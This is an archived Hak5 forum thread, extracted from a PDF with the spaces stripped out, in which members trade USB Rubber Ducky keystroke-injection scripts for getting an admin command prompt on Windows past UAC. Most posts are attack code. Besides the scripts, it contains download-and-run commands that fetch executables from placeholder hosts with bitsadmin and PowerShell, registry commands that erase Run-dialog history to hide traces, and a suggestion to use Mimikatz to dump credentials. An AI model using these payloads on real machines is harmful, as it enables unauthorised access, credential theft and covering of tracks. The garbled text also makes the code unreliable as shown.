Sie sind auf Seite 1von 13

Hak5Forums

Browse
Forums

Existinguser?SignIn

SignUp

Search...

Activity
Staff

OnlineUsers

Home ActiveProjects USBRubberDucky [Payload]FasterUACBypass

AllActivity

Archived
Thistopicisnowarchivedandisclosedtofurtherreplies.

[Payload]FasterUACBypass
StartedbyDarrenKitchen,August19,2013

17postsinthistopic

DarrenKitchen
Hak5Junkie

PostedAugust19,2013

TheduckisprettygoodatbypassingUAC.Let'smakeitbetter.
REM*********************************
REMPayload:OldMethodtoBypassUAC
REMTarget:Window7
REMAuthor:DarrenKitchen

RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

REM*********************************
GUI
DELAY500
STRINGcmd

DELAY3000
MENU
DELAY2000
STRINGa
REM*************************************************************
REMDependingonWindowsVersionanENTERcouldbenecessaryhere
REM*************************************************************
DELAY3000
LEFT
ENTER
DELAY500
STRINGechoAdminPromptin9seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************
REMPayload:LessFinickyUACBypass
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************
GUIr
DELAY500
STRINGcmd
ENTER
DELAY500
STRINGcopyconsudo.cmd
ENTER
STRING@echoSetobjShell=CreateObject("Shell.Application")>%temp%\sudo.tmp.vbs
ENTER
STRING@echoargs=Right("%*",(Len("%*")Len("%1")))>>%temp%\sudo.tmp.vbs
ENTER
STRING@echoobjShell.ShellExecute"%1",args,"","runas">>%temp%\sudo.tmp.vbs

ENTER
STRING@cscript%temp%\sudo.tmp.vbs
ENTER
CTRLz
ENTER
STRINGsudo.cmdcmd
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin7seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************************
REMPayload:FastestUACBypassusingPowershell
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************************
GUIr
DELAY500
STRINGpowershellStartProcesscmdVerbrunAs
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin5seconds

Notbad.Let'sshaveanother2secondsoff...?
Thoughts?

strangelaw
Newbie

PostedAugust19,2013

(FromBrutelogic)>bitsadmin/transfernhttp://domain/file
c:\%homepath%\file&&c:\%homepath%\file
0

Members
2posts

DarrenKitchen

PostedAugust19,2013

Hak5Junkie

BITSADMINversion3.0[7.5.7601]
BITSadministrationutility.
(C)Copyright20002006MicrosoftCorp.
BITSAdminisdeprecatedandisnotguaranteedtobeavailableinfutureversionsofWindows.
RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

AdministrativetoolsfortheBITSservicearenowprovidedbyBITSPowerShellcmdlets.

Whichiswhy....
powershell(newobjectSystem.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'

Howevercool,itstilldoesn'topenacommandpromptbypassingUAC.

overwraith
Hak5Ninja

PostedAugust19,2013

IfoundawebsitethathasawaytoturnoffUACbycommandline.Don'tknowifUACwillstillbugyouduringthe
turnoffprocedurethough.
http://www.howtogeek.com/howto/windowsvista/enableordisableuacfromthewindowsvistacommandline/
0

ActiveMembers
732posts
Gender:Male

nikkelitous

PostedAugust20,2013

Newbie

On20/08/2013at4:06AM,overwraithsaid:

IfoundawebsitethathasawaytoturnoffUACbycommandline.Don'tknowifUACwillstillbugyou
duringtheturnoffprocedurethough.
Members
1post

http://www.howtogeek.com/howto/windowsvista/enableordisableuacfromthewindowsvistacommand
line/

Unfortunately,thismethodrequiresareboot.ThoughitdoescompletelydisableUACratherthanjustaoneoff.
0

BuckoA51

PostedAugust20,2013

Hak5Fan++

Thecountermeasuretothisis,ofcourse,don'trunasadmin,sothateverytimeUACpopsupyouhavetoput
youradminpasswordin.Thisishowacorporatedesktopshouldbeconfiguredanyway,(orwithUACoffand
nonadminaccountsforthestaff).
0

ActiveMembers
73posts
Gender:Male
Location:UK

DarrenKitchen

PostedAugust20,2013

Hak5Junkie

On20/08/2013at5:16PM,BuckoA51said:

Thecountermeasuretothisis,ofcourse,don'trunasadmin,sothateverytimeUACpopsupyouhaveto
putyouradminpasswordin.Thisishowacorporatedesktopshouldbeconfiguredanyway,(orwithUAC
offandnonadminaccountsforthestaff).
RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

411Hall
Hak5Fan+

Emphasismine.
1

PostedAugust26,2013

Goodstuff!IhavereplacedtheToolkitsmethodwiththisone.
0

ActiveMembers
43posts

BuckoA51

PostedAugust30,2013

Hak5Fan++

Quote
Emphasismine.
TootrueDarrenIknow,lastcompanyIwasatdoingaquickaudit,theyhadWindows7andhalfthestaffwere
runningasadminwithUACon,theotherhalfasadminwithUACdisabled,because,youknow,it'ssuchabindto
click"Yes"everynowandagain.

ActiveMembers
73posts
Gender:Male
Location:UK

tom564

PostedSeptember5,2013

Hak5Fan++

On20/08/2013at0:49AM,DarrenKitchensaid:

REM********************************
REMPayload:LessFinickyUACBypass
REMTarget:Window7
ActiveMembers
95posts

REMAuthor:DarrenKitchen
REM********************************
GUIr

DELAY500
STRINGcmd
ENTER
DELAY500
STRINGcopyconsudo.cmd
ENTER
STRING@echoSetobjShell=CreateObject("Shell.Application")>%temp%\sudo.tmp.vbs
ENTER
STRING@echoargs=Right("%*",(Len("%*")Len("%1")))>>%temp%\sudo.tmp.vbs
ENTER
STRING@echoobjShell.ShellExecute"%1",args,"","runas">>%temp%\sudo.tmp.vbs
ENTER
STRING@cscript%temp%\sudo.tmp.vbs
ENTER
CTRLz
ENTER
STRINGsudo.cmdcmd
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin7seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************************
REMPayload:FastestUACBypassusingPowershell
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************************
GUIr
DELAY500

STRINGpowershellStartProcesscmdVerbrunAs
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin5seconds

Notbad.Let'sshaveanother2secondsoff...?
Thoughts?

HavingpowershellStartProcesscmd.exeVerbrunAsasthelastruncommandintherunpromptwouldmake
mesuspiciousifisawit,isthereanywayyoucancleanupaftertoremovetheobvioustrace?
0

Xcellerator
Hak5Pirate

PostedSeptember6,2013

YoucandeletetheentirehistoryfromtheRundialogusing
regdeleteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU/va/

or,youcanspecifywhatexactcommandyouwantremovedwiththis:
ActiveMembers
285posts
Gender:Male

for/f"tokens=1delims="%%Ain('regqueryHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ru

orchange"powershellStartProcesscmd.exeVerbRunAs"toanythingyoulike.

SN4T14

PostedSeptember11,2013

Newbie

CONTROLESCAPE
DELAY200
STRINGcmd
CTRLSHIFTENTER
Members
1post

DELAY2800
ALTy

Another2secondsshavedoff.)
Edit:Betterversionusingrunmenu,shouldworkwhenthere'salotofentriesinthestartmenu,anddoesn'tput
anunnecessary"y"intheCMDwindowifUACisoff.
GUIR
DELAY200
STRINGrunas/profile/user:%COMPUTERNAME%\Administrator"cmd"
ENTER
DELAY2700
ALTy
DELAY100
BACKSPACE

crackruckles
Newbie

PostedSeptember16,2013

1.PresstheWinkeyboardkeyorclickonVistaStartbutton.
TypecmdintotheStartSearchtextbox.
PressCtrl+Shift+Enterkeyboardshortcut.CtrlShiftEnteristhegeneralkeyboardshortcutthattriggerselevation
ActiveMembers
5posts

toRunasAdministrator.
PressAlt+CorpressContinuetoconfirmtheUACelevationwarningprompt.
http://www.mydigitallife.info/howtoopenelevatedcommandpromptwithadministratorprivilegesinwindows
vista/
0

factgasm
Hak5Fan++

PostedDecember3,2013

TheCTRL+SHIFT+ENTERcomboworksonthekeyboardbuthowdoyoucodethatinDuckyScript?CanDucky
Scripthandlethreekeysbeingpressedsimultaneously?
Itriedthisscriptearlieranditdidn'twork:
DEFAULTDELAY50
DELAY3000

ActiveMembers
110posts

CONTROLESCAPE
STRINGcmd
CONTROLSHIFTENTER
ALTY
EXIT
0

googleknowsbest
Hak5Fan

PostedDecember19,2013

DialogueboxisnothighlightedbeforetheALTy
Win8
0

ActiveMembers
18posts
Gender:Male
Interests:Computers!

Plazmaz
Newbie

PostedAugust19,2014

Youshouldbeabletousethisonwindows8.1:
GUIX
DOWN
DOWN

ActiveMembers
5posts
Gender:

DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER
ALTy

MB60893
Hak5Zombie

PostedSeptember6,2014

Firstly,whenyoureferto"Bypass"UAC,whatyouarereallysayingisdon'tbringupthedialogboxsaying"Do
youwanttorunxyzprogramasAdministrator?".WhatIthinkwouldbebetteristogetadministratorrightsfroma
guestusers'perspective,justaboutguaranteeingthatanyprogramwouldworkifyouneededtoexecuteit.
IfIknewsomeonewhowasanadministrator,IwouldsimplywriteaduckyscriptusingtheCTRLSHIFTENTER
commandtoelevatePowershell,thenusethe"InvokeMimikatz"commandwith"DumpCreds".Thiswould

ActiveMembers
147posts
Gender:Male

outputtheadministratorpasswordforthecomputer(providingitisnotaWindows8/8.1machine).
Iknowthereisawayyoucanexecuteataskasanotheruser...soifyouknewtheadministratorpasswordfora
computer,youcouldsimplyrockupasaguest,andrunthetaskasanadminuser.Thoughts?
0

GOTOTOPICLISTING

USBRubberDucky

Home ActiveProjects USBRubberDucky [Payload]FasterUACBypass

CommunitySoftwarebyInvisionPowerServices,Inc.

AllActivity